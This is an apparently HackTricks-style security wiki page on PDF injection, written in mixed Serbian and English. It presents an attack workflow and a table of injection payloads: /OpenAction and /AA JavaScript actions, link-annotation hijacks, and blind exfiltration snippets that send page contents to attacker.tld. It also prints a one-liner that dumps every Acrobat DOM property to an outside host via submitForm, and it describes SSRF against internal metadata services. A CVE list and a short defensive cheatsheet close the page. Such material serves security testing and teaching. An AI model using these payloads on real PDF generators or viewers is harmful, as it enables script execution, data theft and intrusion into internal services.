PDF Injection

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Ako se vaš unos reflektuje unutar PDF fajla, možete pokušati da inject PDF data da izvršite JavaScript, izvršite SSRF ili ukradete sadržaj PDF-a. PDF syntax is extremely permissive – if you can break out of the string or dictionary that is embedding your input you can append totally new objects (or new keys in the same object) that Acrobat/Chrome will happily parse. Since 2024 a wave of bug-bounty reports have shown that one unescaped parenthesis or back-slash is enough for full script execution.

TL;DR – Modern Attack Workflow (2024-2026)

  1. Pronađite bilo koju vrednost pod kontrolom korisnika koja se nađe unutar (parenthesis string), /URI ( … ) ili /JS ( … ) polja u generisanom PDF-u.
  2. Inject ) (zatvaranje stringa) followed by one of the primitives below i završite sa još jednom otvorenom zagradom da biste održali validnu sintaksu.
  3. Dostavite malicious PDF žrtvi (ili backend servisu koji automatski renderuje fajl – odlično za blind bugs).
  4. Vaš payload se izvršava u PDF viewer-u:
  • Chrome / Edge → PDFium Sandbox
  • Firefox → PDF.js (see CVE-2024-4367)
  • Acrobat → Full JavaScript API (can exfiltrate arbitrary file contents with this.getPageNthWord)

Primer (annotation link hijack):

(https://victim.internal/) ) /A << /S /JavaScript /JS (app.alert("PDF pwned")) >> /Next (

Prva ) zatvara originalni URI string, zatim dodajemo novi Action dictionary koji će Acrobat izvršiti kada korisnik klikne link.

Korisne primitive za injekciju

CiljPayload SnippetNapomene
JavaScript on open/OpenAction << /S /JavaScript /JS (app.alert(1)) >>Izvršava se odmah kada se dokument otvori (radi u Acrobat, ne radi u Chrome).
JavaScript on link/A << /S /JavaScript /JS (fetch('https://attacker.tld/?c='+this.getPageNumWords(0))) >>Radi u PDFium & Acrobat ako kontrolišete /Link annotation.
Blind data exfiltration<< /Type /Action /S /URI /URI (https://attacker.tld/?leak=)Kombinujte sa this.getPageNthWord unutar JS da biste ukrali sadržaj.
Server-Side SSRFSame as above but target an internal URL – great when the PDF is rendered by back-office services that honour /URI.
Additional Actions (/AA)/AA << /O << /S /JavaScript /JS (app.alert(1)) >> >>Prikačite na Page/Annotation/Form dictionary da se izvrši pri otvaranju/fokusu.
Line Break for new objects\nendobj\n10 0 obj\n<< /S /JavaScript /JS (app.alert(1)) >>\nendobjAko biblioteka dozvoljava injektovanje znakova novog reda, možete kreirati potpuno nove objekte.

Embedded Actions as Injection Targets

PDF reader-i tretiraju embedded actions kao što su /OpenAction i /AA (Additional Actions) kao prvoklasne funkcionalnosti koje se mogu pokrenuti kada se dokument otvori ili kada se desi određeni događaj. Ako možete injektovati u bilo koji dictionary koji prihvata actions (Catalog, Page, Annotation, or Form field), možete graft-ovati /AA stablo i pokrenuti JavaScript pri otvaranju/fokusu.

Example payload for generator-side object injection (close the original string/dictionary and inject /AA):

) >> /AA << /O << /S /JavaScript /JS (app.alert('AA fired')) >> >> (

Ovaj obrazac odgovara nedavnim jsPDF problemima u kojima ulaz pod kontrolom napadača, prosleđen u addJS (ili u određena AcroForm polja), izlazi iz predviđenog JavaScript stringa i injektuje Additional Action dictionary.

Trik za slepu enumeraciju

Gareth Heyes (PortSwigger) je objavio jednolinijski skript koji nabraja svaki objekat unutar nepoznatog dokumenta – koristan kada ne možete videti generisani PDF:

) /JS (for(i in this){try{this.submitForm('https://x.tld?'+i+'='+this[i])}catch(e){}}) /S /JavaScript /A << >> (

The code iterates over the Acrobat DOM and makes outbound requests for every property/value pair, giving you a JSON-ish dump of the file. See the white-paper “Portable Data exFiltration” for the full technique.

Real-World Bugs (2023-2026)

  • CVE-2026-25755 – jsPDF addJS PDF object injection: attacker-controlled strings can close the JS literal and inject /AA/O/JavaScript actions that fire on open/focus.
  • CVE-2024-4367 – Proizvoljno izvršavanje JavaScript-a u Firefox’s PDF.js pre 4.2.67 je zaobišlo sandbox pomoću konstruisane /JavaScript akcije.
  • Bug bounty 2024-05 – Veliki fintech je dozvolio customer-supplied invoice notes koje su završile u /URI; izveštaj je plaćen $10k nakon demonstriranog SSRF-a ka internom metadata hostu koristeći file:/// URI.
  • CVE-2023-26155node-qpdf command-injection via unsanitised PDF path pokazuje važnost escape-ovanja backslash-ova i zagrada čak i pre PDF sloja.

Defensive Cheatsheet

  1. Nikada ne konkateniraj sirovi korisnički unos inside () strings or names. Escape \, (, ) as required by §7.3 of the PDF spec or use hex strings <...>.
  2. If you build links, prefer /URI (https://…) that you fully URL-encode; block javascript: schemes in client viewers.
  3. Strip or validate /OpenAction, /AA (additional actions), /Launch, /SubmitForm and /ImportData dictionaries when post-processing PDFs.
  4. On the server side, render untrusted PDFs with a headless converter (e.g. qpdf –decrypt –linearize) that removes JavaScript and external actions.
  5. Keep PDF viewers up to date; PDF.js < 4.2.67 and Acrobat Reader before July 2024 patches allow trivial code execution.
  6. If you use client-side generators (e.g., jsPDF), never pass untrusted input into addJS or AcroForm setters that end up inside PDF action dictionaries.

References

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks